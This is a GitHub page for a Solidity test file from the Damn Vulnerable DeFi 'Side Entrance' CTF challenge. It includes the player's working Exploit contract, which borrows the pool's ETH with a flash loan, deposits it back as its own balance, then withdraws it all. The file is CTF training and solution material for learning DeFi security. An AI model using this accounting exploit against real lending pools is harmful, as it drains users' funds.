forked from DeFiHackLabs/Web3-CTF-Intensive-CoLearning
-
Notifications
You must be signed in to change notification settings - Fork 0
/
SideEntrance.t.sol
80 lines (67 loc) · 2.18 KB
/
SideEntrance.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
// SPDX-License-Identifier: MIT
// Damn Vulnerable DeFi v4 (https://damnvulnerabledefi.xyz)
pragma solidity =0.8.25;
import {Test, console} from "forge-std/Test.sol";
import {SideEntranceLenderPool} from "../../src/side-entrance/SideEntranceLenderPool.sol";
contract SideEntranceChallenge is Test {
address deployer = makeAddr("deployer");
address player = makeAddr("player");
address recovery = makeAddr("recovery");
uint256 constant ETHER_IN_POOL = 1000e18;
uint256 constant PLAYER_INITIAL_ETH_BALANCE = 1e18;
SideEntranceLenderPool pool;
modifier checkSolvedByPlayer() {
vm.startPrank(player, player);
_;
vm.stopPrank();
_isSolved();
}
/**
* SETS UP CHALLENGE - DO NOT TOUCH
*/
function setUp() public {
startHoax(deployer);
pool = new SideEntranceLenderPool();
pool.deposit{value: ETHER_IN_POOL}();
vm.deal(player, PLAYER_INITIAL_ETH_BALANCE);
vm.stopPrank();
}
/**
* VALIDATES INITIAL CONDITIONS - DO NOT TOUCH
*/
function test_assertInitialState() public view {
assertEq(address(pool).balance, ETHER_IN_POOL);
assertEq(player.balance, PLAYER_INITIAL_ETH_BALANCE);
}
/**
* CODE YOUR SOLUTION HERE
*/
function test_sideEntrance() public checkSolvedByPlayer {
Exploit Attack=new Exploit(pool,payable(address(recovery)));
Attack.attack();
}
/**
* CHECKS SUCCESS CONDITIONS - DO NOT TOUCH
*/
function _isSolved() private view {
assertEq(address(pool).balance, 0, "Pool still has ETH");
assertEq(recovery.balance, ETHER_IN_POOL, "Not enough ETH in recovery account");
}
}
contract Exploit {
SideEntranceLenderPool pool;
address payable public recovery;
constructor(SideEntranceLenderPool _pool,address payable _recovery){
pool=_pool;
recovery=_recovery;
}
function attack()public{
pool.flashLoan(address(pool).balance);
pool.withdraw();
recovery.transfer(address(this).balance);
}
function execute()public payable{
pool.deposit{value: address(this).balance}();
}
receive() external payable {}
}